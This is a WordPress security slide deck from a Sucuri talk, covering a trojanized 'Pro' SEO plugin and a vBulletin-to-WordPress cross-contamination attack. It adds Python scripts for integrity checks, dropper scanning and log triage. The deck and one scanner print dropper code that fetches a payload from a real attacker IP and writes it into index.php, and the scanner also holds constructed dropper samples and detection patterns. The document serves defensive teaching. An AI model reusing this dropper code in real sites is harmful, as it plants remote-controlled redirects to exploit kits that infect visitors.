WordPress Security
Learning From Website Hacks
This is me!
Sucuri Inc.
Website Security
o Incident Handling
o Log Analysis

Tony Perez, COO - Sucuri, Inc.

sucuri.net

@perezbox
Let’s Learn from Website Attacks
Analyze some of the things we have seen in recent days/weeks, and better understand what we need to be doing as website owners.

Attack Scenarios
o The Art of Phishing
o Stealing Credit Cards
Scenario Uno (One)
The Art of Phishing Naive Users
Attack of Opportunity
o Holiday season / Holiday spirit
o Did you say Free?

Red Flag[s]
<A href="http://www.[infecteddomain].com.au/wp-content/all-in-one-seopack%20Pro%20v2.1.zip">All in One SEO Pack V2.1 Download Link</A>
Red Alert: http://www.[infecteddomain].com.au

Difference
o Pro Version?
o Legit Version?
Modified file: aioseop_class.php

Intent
o Redirection - porn or exploit kits
o Target: index.php
o Taking content from here:
$code_txt = 'http://91.239.15.61/o1.txt';

o Placing it in the files here:
$index_path = $path.'/index.php';
if(file_put_contents($index_path, $code)){
How?
o Index.php payload:

o Using curl to pull content from here:
$url = 'http://91.239.15.61/java/google.php';

Payload

o Pulls content from:
http://91.239.15.61/google.js - Redirection to Porn Sites
http://91.239.15.61/g.php - Exploit Kits
Lesson to Be Learned
o Trust but verify sources
o This is not isolated to plugins; it can happen to themes as well
o This is the season in which attackers prey on our need to spend $$$ and be online. Be vigilant!
o The vulnerability was the website administrator…
Scenario Dos (Two)
Got e-Commerce? Leverage 3rd-party CMS applications in your stack?
Got e-Commerce?
o Business owners <3 E-commerce
o CMS extensibility = WooCommerce
o Quick setup of payment collection systems for goods
o Awesome, right?

Big Target
o Credit Card = Cha-Ching
o Used/shared/sold underground
o Impact is catastrophic
o Blacklisting
o Ban
o No more cash flow! No more Trust!
Cross-contamination
Simple concept in which your website is attacked and infected by a neighboring site in the same environment.

vBulletin
o Popular CMS Application for Forums
o WordPress + vBulletin Configurations Common

Scenario
o WordPress: Main website | Blog | e-Commerce
o vBulletin: Forum
o 1 Server

Payload
Found here: /wp-admin/includes/list.php

How?
o It’s about the journey folks…

Scenario
o list.php?
o shop.txt?

That’s Interesting

/forum/ajax.php?edit=

vBulletin Plugin
o Backdoor shell was installed into vBulletin giving the attacker the tools they needed to attack the WordPress installation.

Dump of Users

Attack Vector
o Access Control

Lessons to be Learned
o Attackers are smart – surprise!!!
o Cross-contamination is a real threat today!
o Must be diligent across our stack!
o Isolate applications if possible.

What can you do?
Let’s get proactive!
Harsh Reality
None of the security plugins out there would have prevented either of these attacks. So much for all those hardening tips…

Two Important Vectors
o Access control
o Within your control…
o Software vulnerabilities
o Not so much…

Defense in Depth
• There is no single cure
• Layered Defenses
• Combination of tools and actions
– Combine: Protection and Detection

Access Control
o Google Authenticator – 2FA
o http://wordpress.org/plugins/google-authenticator/
o Duo Security – 2FA
o http://wordpress.org/plugins/duo-wordpress/
o Login Security Solution – Policy / Enforcement
o http://wordpress.org/plugins/login-security-solution/
o Sucuri CloudProxy / Detection / Remediation - Complete Website Security
o http://sucuri.net/signup
Software Vulnerabilities
o Trusted Sources
o Start with the repo and established communities
o If you’re not a developer, this is mostly going to be beyond your reach
o Web Application Firewall (WAF) Plugins
o Highly ineffective; evading and bypassing them is easy
o Can cause Denial of Service on the site itself
o SaaS based Web Application Firewall (WAF) more effective!
o Sucuri CloudProxy WAF
Auditing
• Know what is going on with your site
– Integrity Checks
– Logging in / Logging out
– Changes being made

• More important than half the hardening tips you read online today

• Options:
– WP Security Audit Log http://wordpress.org/plugins/wp-security-audit-log/
– Sucuri Premium Plugin http://wordpress.sucuri.net
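As an added example (not code from the slides or from Sucuri), here is a small Python baseline-and-verify script for the integrity checks listed above; it is the kind of check that would have flagged the modified aioseop_class.php from the first scenario as well as the payload dropped into /wp-admin/includes/list.php in the second. The directory name all-in-one-seopack and all file contents are constructed for the demo; only the wp-content path and aioseop_class.php come from the deck.

```python
# Added example (not from the slides): baseline-and-verify file integrity
# check for a WordPress content tree. Records the sha256 of every file once
# from a trusted install, then reports what has changed since.
import hashlib
import json
import tempfile
from pathlib import Path
from typing import Dict, List


def hash_tree(root: Path) -> Dict[str, str]:
    """Return {relative_posix_path: sha256_hex} for every regular file under root."""
    manifest: Dict[str, str] = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            rel = path.relative_to(root).as_posix()
            manifest[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return manifest


def save_baseline(root: Path, baseline_file: Path) -> None:
    """Write the current tree's manifest; keep this file outside the web root."""
    baseline_file.write_text(json.dumps(hash_tree(root), indent=2, sort_keys=True))


def compare(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Classify every difference as modified (hash changed), added or removed.
    A tampered plugin file (the deck's aioseop_class.php) lands under
    'modified'; a dropped payload file the install never shipped lands under 'added'."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def verify(root: Path, baseline_file: Path) -> Dict[str, List[str]]:
    """Re-hash the tree and diff it against the stored baseline."""
    baseline = json.loads(baseline_file.read_text())
    return compare(baseline, hash_tree(root))


def run_demo() -> Dict[str, List[str]]:
    """Constructed scenario: baseline a clean plugin tree, then tamper with it the
    way the deck describes (one file changed, one dropped, one deleted) and verify."""
    with tempfile.TemporaryDirectory() as d:
        content = Path(d) / "wp-content"
        plugin = content / "plugins" / "all-in-one-seopack"   # constructed name
        plugin.mkdir(parents=True)
        (plugin / "aioseop_class.php").write_text("<?php // clean plugin code\n")
        (plugin / "readme.txt").write_text("All in One SEO Pack\n")
        baseline_file = Path(d) / "baseline.json"             # outside the tree
        save_baseline(content, baseline_file)

        # Simulated tampering (constructed, not the actual malware).
        (plugin / "aioseop_class.php").write_text("<?php // clean plugin code\n// appended\n")
        (plugin / "extra.php").write_text("<?php // file that was never shipped\n")
        (plugin / "readme.txt").unlink()
        return verify(content, baseline_file)


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

Run the baseline step right after a clean install or update, and re-run verify from cron; any non-empty list is a change you either made yourself or need to investigate.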

If all else fails…
o Be sure you have backups…
o VaultPress – WordPress Sites
o Sucuri Backups – WordPress and Everything else
o SaaS based Backups more effective!

Tony Perez
@perezbox | @sucuri_security

tony@sucuri.net
#wordsesh


 
week 1 cookery 8 fourth - quarter .pptx
week 1 cookery 8  fourth  -  quarter .pptxweek 1 cookery 8  fourth  -  quarter .pptx
week 1 cookery 8 fourth - quarter .pptx
 
Concurrency Control in Database Management system
Concurrency Control in Database Management systemConcurrency Control in Database Management system
Concurrency Control in Database Management system
 
Expanded definition: technical and operational
Expanded definition: technical and operationalExpanded definition: technical and operational
Expanded definition: technical and operational
 
How to Fix XML SyntaxError in Odoo the 17
How to Fix XML SyntaxError in Odoo the 17How to Fix XML SyntaxError in Odoo the 17
How to Fix XML SyntaxError in Odoo the 17
 
4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptx4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptx
 
THEORIES OF ORGANIZATION-PUBLIC ADMINISTRATION
THEORIES OF ORGANIZATION-PUBLIC ADMINISTRATIONTHEORIES OF ORGANIZATION-PUBLIC ADMINISTRATION
THEORIES OF ORGANIZATION-PUBLIC ADMINISTRATION
 
Multi Domain Alias In the Odoo 17 ERP Module
Multi Domain Alias In the Odoo 17 ERP ModuleMulti Domain Alias In the Odoo 17 ERP Module
Multi Domain Alias In the Odoo 17 ERP Module
 
Mattingly "AI & Prompt Design: Large Language Models"
Mattingly "AI & Prompt Design: Large Language Models"Mattingly "AI & Prompt Design: Large Language Models"
Mattingly "AI & Prompt Design: Large Language Models"
 
ESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnv
ESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnvESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnv
ESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnv
 
Faculty Profile prashantha K EEE dept Sri Sairam college of Engineering
Faculty Profile prashantha K EEE dept Sri Sairam college of EngineeringFaculty Profile prashantha K EEE dept Sri Sairam college of Engineering
Faculty Profile prashantha K EEE dept Sri Sairam college of Engineering
 
ICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdfICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdf
 
Congestive Cardiac Failure..presentation
Congestive Cardiac Failure..presentationCongestive Cardiac Failure..presentation
Congestive Cardiac Failure..presentation
 
IPCRF/RPMS 2024 Classroom Observation tool is your access to the new performa...
IPCRF/RPMS 2024 Classroom Observation tool is your access to the new performa...IPCRF/RPMS 2024 Classroom Observation tool is your access to the new performa...
IPCRF/RPMS 2024 Classroom Observation tool is your access to the new performa...
 

WordPress Security - Learning From Hacks

  • 2. This is me!
    Sucuri Inc. - Website Security
    o Incident Handling
    o Log Analysis
  • 3. Let's Learn from Website Attacks
    Analyze some of the things we have seen in recent days/weeks, and better understand what we need to be doing as website owners.
  • 4.
  • 5. Attack Scenarios
    o The Art of Phishing
    o Stealing Credit Cards
  • 6. Scenario Uno (One)
    The art of phishing naive users
  • 7. Attack of Opportunity
    o Holiday season / holiday spirit
    o Did you say free?
  • 8.
  • 9. Red Flag[s]
    <A href="http://www.[infecteddomain].com.au/wp-content/all-in-one-seopack%20Pro%20v2.1.zip">All in One SEO Pack V2.1 Download Link</A>
    Red Alert: http://www.[infecteddomain].com.au (the "Pro" zip is served from an unrelated, compromised third-party domain, not from wordpress.org or the plugin's author)
  • 10. Difference
    o "Pro" version vs. legit version: diff the two
    o Modified file: aioseop_class.php
  • 11. Intent
    o Redirection - porn or exploit kits
    o Target: index.php
    o Taking content from here:
      $code_txt = 'http://91.239.15.61/o1.txt';
    o Placing it in the files here:
      $index_path = $path.'/index.php';
      if(file_put_contents($index_path, $code)){
  • 12. How?
    o index.php payload:
    o Using curl to pull content from here:
      $url = 'http://91.239.15.61/java/google.php';
  • 13. Payload
    o Pulls content from:
      http://91.239.15.61/google.js - redirection to porn sites
      http://91.239.15.61/g.php - exploit kits
  • 14. Lesson to Be Learned
    o Trust but verify sources
    o This is not isolated to just plugins; it can happen to themes as well
    o This is the season in which attackers prey on our need to spend $$$ and be online. Be vigilant!
    o The vulnerability was the website administrator…
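The dropper quoted on slides 11 and 12 has a recognisable shape: fetch code from a remote host, then write it into index.php. The scanner below, an added example and not code from the deck or from Sucuri, walks a plugin directory and flags PHP files that match that shape. The only real indicator it carries is the 91.239.15.61 host from the slides; the plugin files it scans, the second dropper and its 203.0.113.5 address are constructed for the demo.

```python
import os
import re
import tempfile

# Real indicator from the slides: the host the trojanized plugin fetched its
# payload from. Everything else in this file is a constructed demo.
KNOWN_BAD_HOSTS = {"91.239.15.61"}

# Heuristics for the dropper idiom the deck quotes: pull code from a remote
# URL, then write it into index.php. Each entry is (name, compiled regex).
HEURISTICS = [
    ("remote_ip_url", re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}/", re.I)),
    ("remote_fetch", re.compile(
        r"\b(?:curl_init|curl_exec|file_get_contents\s*\(\s*['\"]https?://)", re.I)),
    ("write_index_php", re.compile(r"file_put_contents\s*\(\s*\$\w*index\w*", re.I)),
    ("index_php_literal", re.compile(r"['\"]/?index\.php['\"]")),
    ("obfuscation", re.compile(r"\b(?:eval|base64_decode|gzinflate|str_rot13)\s*\(", re.I)),
]


def scan_php_source(src):
    """Return the set of heuristic names the source triggers; 'known_bad_host'
    is added when a staging host from the slides appears verbatim."""
    hits = {name for name, rx in HEURISTICS if rx.search(src)}
    if any(host in src for host in KNOWN_BAD_HOSTS):
        hits.add("known_bad_host")
    return hits


def classify(hits):
    """Verdict: a known host, or a remote fetch combined with a write to
    index.php, is the dropper; any other hit is only 'suspicious' (review by hand)."""
    if "known_bad_host" in hits:
        return "malicious"
    if "remote_fetch" in hits and hits & {"write_index_php", "index_php_literal"}:
        return "malicious"
    return "suspicious" if hits else "clean"


def scan_tree(root):
    """Scan every .php file under root; return {relpath: (verdict, sorted hits)}."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.endswith(".php"):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_php_source(fh.read())
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            results[rel] = (classify(hits), sorted(hits))
    return results


# Constructed sample files. TROJANED_PLUGIN mirrors the fragments quoted on the
# slides ($code_txt, $index_path, file_put_contents); OTHER_DROPPER uses the
# documentation address 203.0.113.5 to show the heuristics work without a
# known host.
CLEAN_PLUGIN = "<?php\nclass All_in_One_SEO_Pack {\n  function title() { return get_the_title(); }\n}\n"
SILENCE = "<?php\n// Silence is golden.\n"
TROJANED_PLUGIN = CLEAN_PLUGIN + """
$code_txt = 'http://91.239.15.61/o1.txt';
$ch = curl_init($code_txt); $code = curl_exec($ch);
$index_path = $path.'/index.php';
if(file_put_contents($index_path, $code)){ }
"""
OTHER_DROPPER = """<?php
$c = file_get_contents('http://203.0.113.5/x.txt');
file_put_contents(dirname(__FILE__).'/index.php', $c);
"""


def demo():
    """Lay out a throwaway plugin directory and scan it."""
    plugin = "wp-content/plugins/all-in-one-seo-pack"
    files = {
        f"{plugin}/all_in_one_seo_pack.php": CLEAN_PLUGIN,
        f"{plugin}/aioseop_class.php": TROJANED_PLUGIN,
        f"{plugin}/index.php": SILENCE,
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in files.items():
            full = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, (verdict, hits) in sorted(demo().items()):
        print(f"{verdict:10} {rel}  {hits}")
```

Pattern matching of this kind catches the idiom, not the specific sample, which is why the second dropper is flagged without any indicator match. It is a triage aid, not a verdict: a legitimate updater that downloads over HTTP and writes files will score "suspicious", so treat hits as a reading list and confirm against a known-good copy of the plugin from the repository.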
  • 15. Scenario Dos (Two)
    Got e-commerce? Leverage 3rd-party CMS applications in your stack?
  • 16. Got e-Commerce?
    o Business owners <3 e-commerce
    o CMS extensibility = WooCommerce
    o Quick setup of payment collection systems for goods
    o Awesome, right?
  • 17. Big Target
    o Credit card = cha-ching
    o Used/shared/sold underground
    o Impact is catastrophic
      o Blacklisting
      o Ban
      o No more cash flow! No more trust!
  • 18. Cross-contamination
    Simple concept in which your website is attacked and infected by a neighboring site in the same environment (another application on the same server or hosting account, sharing the same file system and user).
  • 19. vBulletin
    o Popular CMS application for forums
    o WordPress + vBulletin configurations are common
  • 20. Scenario
    o WordPress: main website | blog | e-commerce
    o vBulletin: forum
    o 1 server
  • 21. Payload
    Found here: /wp-admin/includes/list.php
    (there is no list.php in WordPress core's wp-admin/includes; a file at that path has no legitimate reason to exist)
  • 22. How?
    o It's about the journey, folks…
  • 23. Scenario
    o list.php?
    o shop.txt?
  • 24. That's Interesting
    /forum/ajax.php?edit=
  • 25. vBulletin Plugin
    o A backdoor shell was installed into vBulletin, giving the attacker the tools they needed to attack the WordPress installation.
  • 26. Dump of Users
  • 27. Attack Vector
    o Access control
  • 28. Lessons to Be Learned
    o Attackers are smart - surprise!!!
    o Cross-contamination is a real threat today!
    o Must be diligent across our stack!
    o Isolate applications if possible: separate system users, PHP pools and document roots, so a shell in one application cannot write into the other's files.
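Slides 21 to 25 reconstruct the pivot from the web-server logs: a request to the forum's ajax.php with an edit= parameter, then a file under /wp-admin/includes/ being invoked directly. The triage script below is an added example, not part of the deck, that encodes those two observations as rules over access-log lines and correlates them by client address. The log lines are constructed (RFC 5737 addresses); the two paths are the ones the slides name, and the rule that direct requests for PHP under wp-admin/includes or wp-includes are anomalous is an assumption about how core is laid out, since browsers never need those library files directly.

```python
import re
from collections import defaultdict

# Apache/nginx combined-format prefix; referer and user agent may follow.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Library directories a browser never needs to request directly (assumption
# about core layout). A .php file here answering 200 is a dropped shell being
# invoked, e.g. /wp-admin/includes/list.php from the slides.
DIRECT_INCLUDE_RE = re.compile(r"^/wp-admin/includes/[^/]+\.php$|^/wp-includes/.*\.php$")


def parse(line):
    """Parse one log line into a dict, splitting the query string off the path."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"], _, rec["query"] = rec["target"].partition("?")
    return rec


def rule_for(rec):
    """Name the triage rule a request trips, or None."""
    if rec["path"].endswith("/ajax.php") and re.search(r"(?:^|&)edit=", rec["query"]):
        return "forum_ajax_edit"          # the request the slides called out
    if DIRECT_INCLUDE_RE.match(rec["path"]) and rec["status"] == "200":
        return "direct_include_hit"       # 404s are probes; 200 means the file exists
    return None


def triage(lines):
    """Return the flagged requests, in log order, as dicts with ip/ts/path/rule."""
    findings = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        rule = rule_for(rec)
        if rule:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "method": rec["method"],
                             "path": rec["path"], "query": rec["query"], "rule": rule})
    return findings


def pivot_ips(findings):
    """Clients that hit the forum backdoor endpoint and afterwards invoked a file
    under the WordPress include directories: the cross-contamination path."""
    seen = defaultdict(list)
    for f in findings:
        seen[f["ip"]].append(f["rule"])
    return sorted(ip for ip, rules in seen.items()
                  if "forum_ajax_edit" in rules
                  and "direct_include_hit" in rules[rules.index("forum_ajax_edit"):])


# Constructed log lines. Only 203.0.113.7 follows the pivot; the others are
# ordinary admin traffic and a scanner probe that got a 404.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Dec/2013:03:14:07 +0000] "GET /forum/showthread.php?t=42 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Dec/2013:03:14:09 +0000] "POST /forum/ajax.php?edit=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Dec/2013:03:15:31 +0000] "POST /wp-admin/includes/list.php HTTP/1.1" 200 1337 "-" "Mozilla/5.0"
198.51.100.9 - - [02/Dec/2013:03:16:00 +0000] "GET /wp-admin/edit.php HTTP/1.1" 200 20481 "-" "Mozilla/5.0"
198.51.100.9 - - [02/Dec/2013:03:16:02 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 44 "-" "Mozilla/5.0"
192.0.2.33 - - [02/Dec/2013:03:17:45 +0000] "GET /wp-includes/ms-files.php HTTP/1.1" 404 209 "-" "curl/7.3"
"""


if __name__ == "__main__":
    found = triage(SAMPLE_LOG.splitlines())
    for f in found:
        print(f"{f['rule']:20} {f['ip']:14} {f['ts']}  {f['method']} {f['path']}")
    print("pivot from:", pivot_ips(found))
```

The correlation step is the useful part: either rule alone produces noise (forum moderators edit posts, scanners probe include paths), but one client doing both in sequence is exactly the journey slide 22 talks about. On a real server, run it over the forum's and the WordPress site's logs together, since the two virtual hosts usually log to different files.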
  • 29. What can you do? Let's get proactive!
  • 30. Harsh Reality
    None of the security plugins out there would have prevented either of these attacks. So much for all those hardening tips…
  • 31. Two Important Vectors
    o Access control
      o Within your control…
    o Software vulnerabilities
      o Not so much…
  • 32. Defense in Depth
    • There is no single cure
    • Layered defenses
    • Combination of tools and actions
      – Combine protection and detection
  • 33. Access Control
    o Google Authenticator - 2FA
      http://wordpress.org/plugins/google-authenticator/
    o Duo Security - 2FA
      http://wordpress.org/plugins/duo-wordpress/
    o Login Security Solution - policy / enforcement
      http://wordpress.org/plugins/login-security-solution/
    o Sucuri CloudProxy / Detection / Remediation - complete website security
      http://sucuri.net/signup
  • 34. Software Vulnerabilities
    o Trusted sources
      o Start with the repo and established communities
      o If you're not a developer this is going to be mostly beyond your reach
    o Web Application Firewall (WAF) plugins
      o Highly ineffective; evading and bypassing is easy
      o Can themselves cause a denial of service, since the filtering runs in PHP on the same server it is meant to protect
    o SaaS-based Web Application Firewall (WAF) is more effective!
      o Sucuri CloudProxy WAF
  • 35. Auditing
    • Know what is going on with your site
      – Integrity checks
      – Logging in / logging out
      – Changes being made
    • More important than half the hardening tips you read online today
    • Options:
      – WP Security Audit Log http://wordpress.org/plugins/wp-security-audit-log/
      – Sucuri Premium Plugin http://wordpress.sucuri.net
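The integrity check slide 35 asks for is the one control that would have surfaced both scenarios: a modified aioseop_class.php in scenario one and a list.php that does not belong in wp-admin/includes in scenario two. The script below is an added example, not the deck's or any plugin's code: it records a SHA-256 per file as a baseline, then reports what was added, modified or removed. The WordPress and vBulletin file contents it lays out are constructed stand-ins, not real core files.

```python
import hashlib
import json
import os
import tempfile


def build_baseline(root):
    """Map every file under root (path relative to root, '/'-separated) to its
    SHA-256. Keep the result somewhere the web server user cannot write: an
    attacker who can drop list.php can also edit a baseline kept next to it."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            h = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            baseline[rel] = h.hexdigest()
    return baseline


def compare(baseline, current):
    """Report what changed since the baseline was taken."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline.keys() & current.keys()
                           if baseline[p] != current[p]),
    }


def write_tree(root, files):
    """Write {relative path: contents} under root, creating directories."""
    for rel, body in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)


def demo():
    """Constructed install: take a baseline, replay both scenarios, compare."""
    clean = {
        "index.php": "<?php\nrequire __DIR__ . '/wp-blog-header.php';\n",
        "wp-admin/includes/list-table.php": "<?php\n// constructed stand-in for a core file\n",
        "wp-content/plugins/all-in-one-seo-pack/aioseop_class.php":
            "<?php\nclass All_in_One_SEO_Pack {}\n",
        "forum/ajax.php": "<?php\n// constructed stand-in for the vBulletin handler\n",
    }
    with tempfile.TemporaryDirectory() as root:
        write_tree(root, clean)
        # Round-trip through JSON, as the baseline would be stored off-server.
        baseline = json.loads(json.dumps(build_baseline(root)))
        # Scenario 1: plugin file trojanized. Scenario 2: shell dropped into
        # wp-admin/includes by the attacker who came in through the forum.
        write_tree(root, {
            "wp-content/plugins/all-in-one-seo-pack/aioseop_class.php":
                "<?php\nclass All_in_One_SEO_Pack {}\n$code_txt = 'http://91.239.15.61/o1.txt';\n",
            "wp-admin/includes/list.php": "<?php\n// not a WordPress core file\n",
        })
        return compare(baseline, build_baseline(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Two caveats for running this in earnest. Take the baseline right after a clean install or update, and again after every legitimate update, or the report fills with core changes. And keep the baseline (and the script) outside the document root, owned by a user the PHP process cannot write as; otherwise the same write access that dropped the shell can rewrite the hashes.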
  • 36. If all else fails…
    o Be sure you have backups…
    o VaultPress - WordPress sites
    o Sucuri Backups - WordPress and everything else
    o SaaS-based (off-server) backups are more effective!
  • 37. Tony Perez
    @perezbox | @sucuri_security
    tony@sucuri.net
    #wordsesh

Editor's Notes

  1. Defense in depth is a pretty standard phrase in the security world: there is no dependency on any one control, but rather a series of controls implemented throughout the stack to ensure integrity and security. It's simple and effective, yet many don't apply it, for whatever reason. We're too busy focusing on that quick solution that will end all my problems: that one plugin that will harden my entire site to the point where I won't be able to access it and none of my plugins will work.
  2. Be sure to check out Jason Cosper's presentation from earlier this evening; it should be up on WordSesh soon. He goes through some good tips on hardening your WordPress site.